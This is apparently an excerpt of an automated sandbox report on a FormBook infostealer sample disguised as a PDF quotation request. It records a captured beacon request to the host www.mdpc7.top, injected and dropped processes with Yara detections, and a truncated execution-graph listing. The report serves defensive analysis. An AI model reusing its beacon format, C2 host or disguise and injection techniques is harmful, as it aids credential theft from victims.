                                                                  Nov 18, 2024 13:14:55.238636017 CET538OUTGET /55tt/?0PIXBf9=Ogm+Zpk+8l6HQ6PINDlmGUkcF8k7x5YOd8W05nhCgxhbbgxSQo8C646ORpAxt2ba51M1bpBVlaSpASxEjtHc742t+MiRm52SMn9uh/BsfFsC8+xAemM0t+vEaw1VEDnH1Ike7P0+r0HF&tD_=f00xUVKh HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Connection: close
                                                                  Host: www.mdpc7.top
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Nov 18, 2024 13:14:56.188889027 CET336INHTTP/1.1 404 Not Found
                                                                  Content-Length: 162
                                                                  Content-Type: text/html;charset=utf-8
                                                                  Date: Mon, 18 Nov 2024 12:14:56 GMT
                                                                  Server: nginx
                                                                  X-Cache: BYPASS
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 77 65 62 6d 61 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 0a 20 20 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 63 65 6e 74 65 72 3e 77 65 62 6d 61 6e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <html><head> <title>404 Not Found - webman</title></head><body><center> <h1>404 Not Found</h1></center><hr><center>webman</center></body></html>


                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:2
                                                                  Start time:07:11:54
                                                                  Start date:18/11/2024
                                                                  Path:C:\Users\user\Desktop\Quotation request -30112024_pdf.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\Quotation request -30112024_pdf.exe"
                                                                  Imagebase:0x400000
                                                                  File size:970'257 bytes
                                                                  MD5 hash:8A44B6F23CEBA13203E4DC3FB33AEA3C
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:7
                                                                  Start time:07:11:56
                                                                  Start date:18/11/2024
                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\Quotation request -30112024_pdf.exe"
                                                                  Imagebase:0xbf0000
                                                                  File size:46'504 bytes
                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1643178908.0000000006880000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1641218754.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1642068110.0000000004A50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:10
                                                                  Start time:09:10:56
                                                                  Start date:18/11/2024
                                                                  Path:C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe"
                                                                  Imagebase:0xe0000
                                                                  File size:140'800 bytes
                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3134403470.0000000003B70000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:11
                                                                  Start time:09:10:58
                                                                  Start date:18/11/2024
                                                                  Path:C:\Windows\SysWOW64\RMActivate_isv.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\SysWOW64\RMActivate_isv.exe"
                                                                  Imagebase:0xaf0000
                                                                  File size:558'080 bytes
                                                                  MD5 hash:CB999CC05F196DCF7300A5D534B3BE7B
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3134393651.0000000003290000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3130613752.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3134574203.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:12
                                                                  Start time:09:11:12
                                                                  Start date:18/11/2024
                                                                  Path:C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe"
                                                                  Imagebase:0xe0000
                                                                  File size:140'800 bytes
                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3137237939.0000000005230000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:16
                                                                  Start time:09:11:30
                                                                  Start date:18/11/2024
                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                  Imagebase:0x7ff722870000
                                                                  File size:676'768 bytes
                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Disassembly

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:3.9%
                                                                    Dynamic/Decrypted Code Coverage:1.4%
                                                                    Signature Coverage:7.6%
                                                                    Total number of Nodes:2000
                                                                    Total number of Limit Nodes:37
                                                                    execution_graph 86104 4010e0 86107 401100 86104->86107 86106 4010f8 86108 401113 86107->86108 86109 401182 86108->86109 86110 401184 86108->86110 86111 40114c 86108->86111 86113 401120 86108->86113 86112 40112c DefWindowProcW 86109->86112 86145 401250 86110->86145 86114 401151 86111->86114 86115 40119d 86111->86115 86112->86106 86113->86112 86166 401000 Shell_NotifyIconW __recalloc 86113->86166 86117 401219 86114->86117 86118 40115d 86114->86118 86120 4011a3 86115->86120 86121 42afb4 86115->86121 86117->86113 86124 401225 86117->86124 86122 401163 86118->86122 86123 42b01d 86118->86123 86119 401193 86119->86106 86120->86113 86130 4011b6 KillTimer 86120->86130 86131 4011db SetTimer RegisterWindowMessageW 86120->86131 86161 40f190 10 API calls 86121->86161 86127 42afe9 86122->86127 86128 40116c 86122->86128 86123->86112 86165 4370f4 52 API calls 86123->86165 86177 468b0e 74 API calls __recalloc 86124->86177 86163 40f190 10 API calls 86127->86163 86128->86113 86135 401174 86128->86135 86129 42b04f 86167 40e0c0 86129->86167 86160 401000 Shell_NotifyIconW __recalloc 86130->86160 86131->86119 86133 401204 CreatePopupMenu 86131->86133 86133->86106 86162 45fd57 65 API calls __recalloc 86135->86162 86139 4011c9 PostQuitMessage 86139->86106 86140 42afe4 86140->86119 86141 42b00e 86164 401a50 400 API calls 86141->86164 86144 42afdc 86144->86112 86144->86140 86146 401262 __recalloc 86145->86146 86147 4012e8 86145->86147 86178 401b80 86146->86178 86147->86119 86149 40128c 86150 4012d1 KillTimer SetTimer 86149->86150 86151 4012bb 86149->86151 86152 4272ec 86149->86152 86150->86147 86153 4012c5 86151->86153 86154 42733f 86151->86154 86155 4272f4 Shell_NotifyIconW 86152->86155 86156 42731a Shell_NotifyIconW 86152->86156 86153->86150 86157 427393 Shell_NotifyIconW 86153->86157 86158 427348 Shell_NotifyIconW 86154->86158 86159 42736e Shell_NotifyIconW 86154->86159 86155->86150 86156->86150 86157->86150 86158->86150 86159->86150 86160->86139 86161->86119 86162->86144 86163->86141 86164->86109 86165->86109 86166->86129 86169 40e0e7 __recalloc 86167->86169 86168 40e142 86170 40e184 86168->86170 86276 4341e6 63 API calls __wcsicoll 86168->86276 86169->86168 86171 42729f DestroyIcon 86169->86171 86173 40e1a0 Shell_NotifyIconW 86170->86173 86174 4272db Shell_NotifyIconW 86170->86174 86171->86168 86175 401b80 54 API calls 86173->86175 86176 40e1ba 86175->86176 86176->86109 86177->86140 86179 401b9c 86178->86179 86198 401c7e 86178->86198 86200 4013c0 86179->86200 86182 42722b LoadStringW 86185 427246 86182->86185 86183 401bb9 86205 402160 86183->86205 86219 40e0a0 86185->86219 86186 401bcd 86188 427258 86186->86188 86189 401bda 86186->86189 86223 40d200 52 API calls 2 library calls 86188->86223 86189->86185 86190 401be4 86189->86190 86218 40d200 52 API calls 2 library calls 86190->86218 86193 427267 86194 42727b 86193->86194 86196 401bf3 _wcscpy __recalloc _wcsncpy 86193->86196 86224 40d200 52 API calls 2 library calls 86194->86224 86197 401c62 Shell_NotifyIconW 86196->86197 86197->86198 86198->86149 86199 427289 86225 4115d7 86200->86225 86206 426daa 86205->86206 86207 40216b _wcslen 86205->86207 86263 40c600 86206->86263 86210 402180 86207->86210 86211 40219e 86207->86211 86209 426db5 86209->86186 86262 403bd0 52 API calls ctype 86210->86262 86212 4013a0 52 API calls 86211->86212 86214 4021a5 86212->86214 86216 426db7 86214->86216 86217 4115d7 52 API calls 86214->86217 86215 402187 _memmove 86215->86186 86217->86215 86218->86196 86220 40e0b2 86219->86220 86221 40e0a8 86219->86221 86220->86196 86275 403c30 52 API calls _memmove 86221->86275 86223->86193 86224->86199 86227 4115e1 _malloc 86225->86227 86228 4013e4 86227->86228 86232 4115fd std::exception::exception 86227->86232 86239 4135bb 86227->86239 86236 4013a0 86228->86236 86229 41163b 86254 4180af 46 API calls std::exception::operator= 86229->86254 86231 411645 86255 418105 RaiseException 86231->86255 86232->86229 86253 41130a 51 API calls __cinit 86232->86253 86235 411656 86237 4115d7 52 API calls 86236->86237 86238 4013a7 86237->86238 86238->86182 86238->86183 86240 413638 _malloc 86239->86240 86249 4135c9 _malloc 86239->86249 86261 417f77 46 API calls __getptd_noexit 86240->86261 86243 4135f7 RtlAllocateHeap 86244 413630 86243->86244 86243->86249 86244->86227 86246 413624 86259 417f77 46 API calls __getptd_noexit 86246->86259 86249->86243 86249->86246 86250 413622 86249->86250 86251 4135d4 86249->86251 86260 417f77 46 API calls __getptd_noexit 86250->86260 86251->86249 86256 418901 46 API calls __NMSG_WRITE 86251->86256 86257 418752 46 API calls 7 library calls 86251->86257 86258 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86251->86258 86253->86229 86254->86231 86255->86235 86256->86251 86257->86251 86259->86250 86260->86244 86261->86244 86262->86215 86264 40c619 86263->86264 86265 40c60a 86263->86265 86264->86209 86265->86264 86268 4026f0 86265->86268 86267 426d7a _memmove 86267->86209 86269 426873 86268->86269 86270 4026ff 86268->86270 86271 4013a0 52 API calls 86269->86271 86270->86267 86272 42687b 86271->86272 86273 4115d7 52 API calls 86272->86273 86274 42689e _memmove 86273->86274 86274->86267 86275->86220 86276->86170 86277 42d142 86281 480a8d 86277->86281 86279 42d14f 86280 480a8d 261 API calls 86279->86280 86280->86279 86282 480ae4 86281->86282 86283 480b26 86281->86283 86285 480aeb 86282->86285 86286 480b15 86282->86286 86312 40bc70 86283->86312 86287 480aee 86285->86287 86288 480b04 86285->86288 86319 4805bf 261 API calls 86286->86319 86287->86283 86290 480af3 86287->86290 86318 47fea2 261 API calls __itow_s 86288->86318 86317 47f135 261 API calls 86290->86317 86292 480aff 86346 408f40 86292->86346 86293 40e0a0 52 API calls 86308 480b2e 86293->86308 86297 481156 86299 408f40 VariantClear 86297->86299 86298 40c2c0 52 API calls 86298->86308 86300 48115e 86299->86300 86300->86279 86301 40e710 53 API calls 86301->86308 86304 480ff5 86345 45e737 90 API calls 3 library calls 86304->86345 86305 408e80 VariantClear 86305->86308 86306 40a780 261 API calls 86306->86308 86308->86292 86308->86293 86308->86298 86308->86301 86308->86304 86308->86305 86308->86306 86320 401980 86308->86320 86328 45377f 52 API calls 86308->86328 86329 45e951 53 API calls 86308->86329 86330 40e830 86308->86330 86343 47925f 53 API calls 86308->86343 86344 47fcff 261 API calls 86308->86344 86313 4115d7 52 API calls 86312->86313 86314 40bc98 86313->86314 86315 4115d7 52 API calls 86314->86315 86316 40bca6 86315->86316 86316->86308 86317->86292 86318->86292 86319->86292 86321 4019a3 86320->86321 86325 401985 86320->86325 86322 4019b8 86321->86322 86321->86325 86351 403e10 53 API calls 86322->86351 86324 40199f 86324->86308 86325->86324 86350 403e10 53 API calls 86325->86350 86327 4019c4 86327->86308 86328->86308 86329->86308 86331 427c86 86330->86331 86332 40e84a 86330->86332 86353 40e1f0 VariantClear ctype 86331->86353 86352 40e950 53 API calls 86332->86352 86335 427c8b 86354 40e950 53 API calls 86335->86354 86336 40e84f 86336->86335 86337 40e85c 86336->86337 86338 4115d7 52 API calls 86337->86338 86342 40e907 86337->86342 86340 40e8fc 86338->86340 86341 4115d7 52 API calls 86340->86341 86341->86342 86342->86308 86343->86308 86344->86308 86345->86292 86347 408f48 ctype 86346->86347 86348 4265c7 VariantClear 86347->86348 86349 408f55 ctype 86347->86349 86348->86349 86349->86297 86350->86324 86351->86327 86352->86336 86353->86335 86354->86342 86355 40bd20 86356 428194 86355->86356 86357 40bd2d 86355->86357 86359 40bd43 86356->86359 86361 4281bc 86356->86361 86362 4281b2 86356->86362 86358 40bd37 86357->86358 86378 4531b1 85 API calls 5 library calls 86357->86378 86367 40bd50 86358->86367 86377 45e987 86 API calls ctype 86361->86377 86376 40b510 VariantClear 86362->86376 86366 4281ba 86368 426cf1 86367->86368 86369 40bd63 86367->86369 86388 44cde9 52 API calls _memmove 86368->86388 86379 40bd80 86369->86379 86372 40bd73 86372->86359 86373 426cfc 86374 40e0a0 52 API calls 86373->86374 86375 426d02 86374->86375 86376->86366 86377->86357 86378->86358 86380 40bd8e 86379->86380 86387 40bdb7 _memmove 86379->86387 86381 40bded 86380->86381 86382 40bdad 86380->86382 86380->86387 86384 4115d7 52 API calls 86381->86384 86389 402f00 86382->86389 86385 40bdf6 86384->86385 86386 4115d7 52 API calls 86385->86386 86385->86387 86386->86387 86387->86372 86388->86373 86390 402f10 86389->86390 86391 402f0c 86389->86391 86392 4115d7 52 API calls 86390->86392 86393 4268c3 86390->86393 86391->86387 86394 402f51 ctype _memmove 86392->86394 86394->86387 86395 425ba2 86400 40e360 86395->86400 86397 425bb4 86416 41130a 51 API calls __cinit 86397->86416 86399 425bbe 86401 4115d7 52 API calls 86400->86401 86402 40e3ec GetModuleFileNameW 86401->86402 86417 413a0e 86402->86417 86404 40e421 _wcsncat 86420 413a9e 86404->86420 86407 4115d7 52 API calls 86408 40e45e _wcscpy 86407->86408 86409 40bc70 52 API calls 86408->86409 86410 40e498 86409->86410 86423 40e4c0 86410->86423 86412 40e4a9 86412->86397 86413 401c90 52 API calls 86414 40e4a1 _wcscat _wcslen _wcsncpy 86413->86414 86414->86412 86414->86413 86415 4115d7 52 API calls 86414->86415 86415->86414 86416->86399 86437 413801 86417->86437 86467 419efd 86420->86467 86479 403350 86423->86479 86425 40e4cb RegOpenKeyExW 86426 427190 RegQueryValueExW 86425->86426 86427 40e4eb 86425->86427 86428 4271b0 86426->86428 86429 42721a RegCloseKey 86426->86429 86427->86414 86430 4115d7 52 API calls 86428->86430 86429->86414 86431 4271cb 86430->86431 86486 43652f 52 API calls 86431->86486 86433 4271d8 RegQueryValueExW 86434 4271f7 86433->86434 86436 42720e 86433->86436 86435 402160 52 API calls 86434->86435 86435->86436 86436->86429 86438 41389e 86437->86438 86444 41381a 86437->86444 86439 4139e8 86438->86439 86441 413a00 86438->86441 86464 417f77 46 API calls __getptd_noexit 86439->86464 86466 417f77 46 API calls __getptd_noexit 86441->86466 86442 4139ed 86465 417f25 10 API calls __wcsicoll 86442->86465 86444->86438 86451 41388a 86444->86451 86459 419e30 46 API calls __wcsicoll 86444->86459 86447 41396c 86447->86438 86449 413967 86447->86449 86452 41397a 86447->86452 86448 413929 86448->86438 86450 413945 86448->86450 86461 419e30 46 API calls __wcsicoll 86448->86461 86449->86404 86450->86438 86450->86449 86455 41395b 86450->86455 86451->86438 86458 413909 86451->86458 86460 419e30 46 API calls __wcsicoll 86451->86460 86463 419e30 46 API calls __wcsicoll 86452->86463 86462 419e30 46 API calls __wcsicoll 86455->86462 86458->86447 86458->86448 86459->86451 86460->86458 86461->86450 86462->86449 86463->86449 86464->86442 86465->86449 86466->86449 86468 419f13 86467->86468 86469 419f0e 86467->86469 86476 417f77 46 API calls __getptd_noexit 86468->86476 86469->86468 86472 419f2b 86469->86472 86471 419f18 86477 417f25 10 API calls __wcsicoll 86471->86477 86474 40e454 86472->86474 86478 417f77 46 API calls __getptd_noexit 86472->86478 86474->86407 86476->86471 86477->86474 86478->86471 86480 403367 86479->86480 86481 403358 86479->86481 86482 4115d7 52 API calls 86480->86482 86481->86425 86483 403370 86482->86483 86484 4115d7 52 API calls 86483->86484 86485 40339e 86484->86485 86485->86425 86486->86433 86487 32629a3 86488 32629aa 86487->86488 86489 32629b2 86488->86489 86490 3262a48 86488->86490 86494 3262658 86489->86494 86507 32632f8 9 API calls 86490->86507 86493 3262a2f 86508 3260048 86494->86508 86497 3262728 CreateFileW 86498 32626f7 86497->86498 86504 3262735 86497->86504 86499 3262751 VirtualAlloc 86498->86499 86498->86504 86505 3262858 CloseHandle 86498->86505 86506 3262868 VirtualFree 86498->86506 86511 3263568 GetPEB 86498->86511 86500 3262772 ReadFile 86499->86500 86499->86504 86501 3262790 VirtualAlloc 86500->86501 86500->86504 86501->86498 86501->86504 86502 3262944 VirtualFree 86503 3262952 86502->86503 86503->86493 86504->86502 86504->86503 86505->86498 86506->86498 86507->86493 86510 32606d3 86508->86510 86513 3263508 GetPEB 86508->86513 86510->86498 86512 3263592 86511->86512 86512->86497 86513->86510 86514 42b14b 86521 40bc10 86514->86521 86516 42b159 86532 4096a0 86516->86532 86518 42b177 86659 44b92d VariantClear 86518->86659 86520 42bc5b 86522 40bc24 86521->86522 86523 40bc17 86521->86523 86525 40bc2a 86522->86525 86526 40bc3c 86522->86526 86660 408e80 VariantClear 86523->86660 86661 408e80 VariantClear 86525->86661 86529 4115d7 52 API calls 86526->86529 86527 40bc1f 86527->86516 86531 40bc43 86529->86531 86530 40bc33 86530->86516 86531->86516 86533 4096c6 _wcslen 86532->86533 86534 4115d7 52 API calls 86533->86534 86598 40a70c ctype _memmove 86533->86598 86535 4096fa _memmove 86534->86535 86537 4115d7 52 API calls 86535->86537 86536 4013a0 52 API calls 86538 4297aa 86536->86538 86539 40971b 86537->86539 86541 4115d7 52 API calls 86538->86541 86540 409749 CharUpperBuffW 86539->86540 86543 40976a ctype 86539->86543 86539->86598 86540->86543 86581 4297d1 _memmove 86541->86581 86589 4097e5 ctype 86543->86589 86770 47dcbb 263 API calls 86543->86770 86545 408f40 VariantClear 86546 42ae92 86545->86546 86822 410c60 VariantClear ctype 86546->86822 86548 42aea4 86549 409aa2 86551 4115d7 52 API calls 86549->86551 86556 409afe 86549->86556 86549->86581 86550 40a689 86553 4115d7 52 API calls 86550->86553 86551->86556 86552 4115d7 52 API calls 86552->86589 86570 40a6af ctype _memmove 86553->86570 86554 409b2a 86558 429dbe 86554->86558 86625 409b4d ctype _memmove 86554->86625 86801 40b400 VariantClear VariantClear ctype 86554->86801 86556->86554 86557 4115d7 52 API calls 86556->86557 86559 429d31 86557->86559 86564 429dd3 86558->86564 86802 40b400 VariantClear VariantClear ctype 86558->86802 86563 429d42 86559->86563 86798 44a801 52 API calls 86559->86798 86560 429a46 VariantClear 86560->86589 86561 409fd2 86568 40a045 86561->86568 86619 42a3f5 86561->86619 86574 40e0a0 52 API calls 86563->86574 86564->86625 86803 40e1c0 VariantClear ctype 86564->86803 86565 408f40 VariantClear 86565->86589 86572 4115d7 52 API calls 86568->86572 86579 4115d7 52 API calls 86570->86579 86580 40a04c 86572->86580 86575 429d57 86574->86575 86799 453443 52 API calls 86575->86799 86577 42a42f 86808 45e737 90 API calls 3 library calls 86577->86808 86579->86598 86584 40a0a7 86580->86584 86662 4091e0 86580->86662 86821 45e737 90 API calls 3 library calls 86581->86821 86582 4299d9 86587 408f40 VariantClear 86582->86587 86604 40a0af 86584->86604 86809 40c790 VariantClear ctype 86584->86809 86586 429abd 86586->86518 86590 4299e2 86587->86590 86588 429d88 86800 453443 52 API calls 86588->86800 86589->86549 86589->86550 86589->86552 86589->86560 86589->86565 86589->86570 86589->86581 86589->86582 86589->86586 86596 42a452 86589->86596 86728 40a780 86589->86728 86771 40c2c0 86589->86771 86789 40c4e0 261 API calls 86589->86789 86791 40ba10 86589->86791 86797 40e270 VariantClear ctype 86589->86797 86790 410c60 VariantClear ctype 86590->86790 86596->86545 86598->86536 86599 4115d7 52 API calls 86599->86625 86601 44a801 52 API calls 86601->86625 86602 408f40 VariantClear 86633 40a162 ctype _memmove 86602->86633 86603 402780 52 API calls 86603->86625 86605 40a11b 86604->86605 86606 42a4b4 VariantClear 86604->86606 86604->86633 86612 40a12d ctype 86605->86612 86810 40e270 VariantClear ctype 86605->86810 86606->86612 86607 40a780 261 API calls 86607->86625 86609 401980 53 API calls 86609->86625 86611 4115d7 52 API calls 86611->86633 86612->86611 86612->86633 86615 42a74d VariantClear 86615->86633 86616 41130a 51 API calls __cinit 86616->86625 86617 40a368 86620 42aad4 86617->86620 86627 40a397 86617->86627 86618 40e270 VariantClear 86618->86633 86807 47390f VariantClear 86619->86807 86814 46fe90 VariantClear VariantClear ctype 86620->86814 86621 42a7e4 VariantClear 86621->86633 86622 42a886 VariantClear 86622->86633 86624 409c95 86624->86518 86625->86561 86625->86577 86625->86598 86625->86599 86625->86601 86625->86603 86625->86607 86625->86609 86625->86616 86625->86619 86625->86624 86804 45f508 52 API calls 86625->86804 86805 403e10 53 API calls 86625->86805 86806 408e80 VariantClear 86625->86806 86626 40a3ce 86637 40a3d9 ctype 86626->86637 86815 40b400 VariantClear VariantClear ctype 86626->86815 86627->86626 86652 40a42c ctype 86627->86652 86769 40b400 VariantClear VariantClear ctype 86627->86769 86630 42abaf 86636 42abd4 VariantClear 86630->86636 86645 40a4ee ctype 86630->86645 86631 4115d7 52 API calls 86631->86633 86632 4115d7 52 API calls 86635 42a5a6 VariantInit VariantCopy 86632->86635 86633->86602 86633->86615 86633->86617 86633->86618 86633->86620 86633->86621 86633->86622 86633->86631 86633->86632 86811 470870 52 API calls 86633->86811 86812 408e80 VariantClear 86633->86812 86813 44ccf1 VariantClear ctype 86633->86813 86634 40a4dc 86634->86645 86817 40e270 VariantClear ctype 86634->86817 86635->86633 86639 42a5c6 VariantClear 86635->86639 86636->86645 86638 40a41a 86637->86638 86644 42ab44 VariantClear 86637->86644 86637->86652 86638->86652 86816 40e270 VariantClear ctype 86638->86816 86639->86633 86640 42ac4f 86646 42ac79 VariantClear 86640->86646 86650 40a546 ctype 86640->86650 86643 40a534 86643->86650 86818 40e270 VariantClear ctype 86643->86818 86644->86652 86645->86640 86645->86643 86646->86650 86647 42ad28 86653 42ad4e VariantClear 86647->86653 86658 40a583 ctype 86647->86658 86650->86647 86651 40a571 86650->86651 86651->86658 86819 40e270 VariantClear ctype 86651->86819 86652->86630 86652->86634 86653->86658 86655 40a650 ctype 86655->86518 86656 42ae0e VariantClear 86656->86658 86658->86655 86658->86656 86820 40e270 VariantClear ctype 86658->86820 86659->86520 86660->86527 86661->86530 86663 409202 86662->86663 86664 42d7ad 86662->86664 86720 409216 ctype 86663->86720 86967 410940 400 API calls 86663->86967 86970 45e737 90 API calls 3 library calls 86664->86970 86667 409386 86668 40939c 86667->86668 86968 40f190 10 API calls 86667->86968 86668->86584 86670 4095b2 86670->86668 86671 4095bf 86670->86671 86969 401a50 400 API calls 86671->86969 86672 409253 PeekMessageW 86672->86720 86674 42d8cd Sleep 86674->86720 86675 4095c6 LockWindowUpdate DestroyWindow GetMessageW 86675->86668 86678 4095f9 86675->86678 86677 42e13b 86988 40d410 VariantClear 86677->86988 86680 42e158 TranslateMessage DispatchMessageW GetMessageW 86678->86680 86680->86680 86683 42e188 86680->86683 86682 409567 PeekMessageW 86682->86720 86683->86668 86686 44c29d 52 API calls 86727 4094e0 86686->86727 86687 46f3c1 107 API calls 86687->86720 86688 40e0a0 52 API calls 86688->86720 86689 46fdbf 108 API calls 86689->86727 86690 409551 TranslateMessage DispatchMessageW 86690->86682 86692 42dcd2 WaitForSingleObject 86694 42dcf0 GetExitCodeProcess CloseHandle 86692->86694 86692->86720 86693 42dd3d Sleep 86693->86727 86977 40d410 VariantClear 86694->86977 86698 4094cf Sleep 86698->86727 86700 40d410 VariantClear 86700->86720 86702 42d94d timeGetTime 86973 465124 53 API calls 86702->86973 86703 40c620 timeGetTime 86703->86727 86706 465124 53 API calls 86706->86727 86707 47d33e 378 API calls 86707->86720 86708 42dd89 CloseHandle 86708->86727 86710 42de19 GetExitCodeProcess CloseHandle 86710->86727 86713 42de88 Sleep 86713->86720 86715 4096a0 378 API calls 86715->86720 86716 45e737 90 API calls 86716->86720 86719 408f40 VariantClear 86719->86727 86720->86667 86720->86672 86720->86674 86720->86677 86720->86682 86720->86687 86720->86688 86720->86690 86720->86692 86720->86693 86720->86698 86720->86700 86720->86702 86720->86707 86720->86715 86720->86716 86721 42e0cc VariantClear 86720->86721 86722 408f40 VariantClear 86720->86722 86720->86727 86823 4091b0 86720->86823 86881 40afa0 86720->86881 86907 408fc0 86720->86907 86942 408cc0 86720->86942 86956 40d150 86720->86956 86961 40d170 86720->86961 86971 465124 53 API calls 86720->86971 86972 40c620 timeGetTime 86720->86972 86987 40e270 VariantClear ctype 86720->86987 86721->86720 86722->86720 86724 401980 53 API calls 86724->86727 86725 401b10 52 API calls 86725->86727 86727->86686 86727->86689 86727->86703 86727->86706 86727->86708 86727->86710 86727->86713 86727->86719 86727->86720 86727->86724 86727->86725 86974 45178a 54 API calls 86727->86974 86975 47d33e 400 API calls 86727->86975 86976 453bc6 54 API calls 86727->86976 86978 40d410 VariantClear 86727->86978 86979 443d19 67 API calls _wcslen 86727->86979 86980 4574b4 VariantClear 86727->86980 86981 403cd0 86727->86981 86985 4731e1 VariantClear 86727->86985 86986 4331a2 6 API calls 86727->86986 86729 40a7a6 86728->86729 86730 40ae8c 86728->86730 86732 4115d7 52 API calls 86729->86732 88373 41130a 51 API calls __cinit 86730->88373 86767 40a7c6 ctype _memmove 86732->86767 86733 40a86d 86734 40abd1 86733->86734 86752 40a878 ctype 86733->86752 88378 45e737 90 API calls 3 library calls 86734->88378 86735 401b10 52 API calls 86735->86767 86737 40bc10 53 API calls 86737->86767 86738 42b791 VariantClear 86738->86767 86739 40b5f0 89 API calls 86739->86767 86740 408e80 VariantClear 86740->86767 86741 42ba2d VariantClear 86741->86767 86742 408f40 VariantClear 86742->86752 86743 42b459 VariantClear 86743->86767 86744 40a884 ctype 86744->86589 86745 408cc0 254 API calls 86745->86767 86747 42b6f6 VariantClear 86747->86767 86748 4530c9 VariantClear 86748->86767 86749 42bc5b 86749->86589 86750 42bbf5 88379 45e737 90 API calls 3 library calls 86750->88379 86751 42bb6a 88381 44b92d VariantClear 86751->88381 86752->86742 86752->86744 86753 40e270 VariantClear 86753->86767 86755 4115d7 52 API calls 86758 42b5b3 VariantInit VariantCopy 86755->86758 86757 408f40 VariantClear 86757->86767 86761 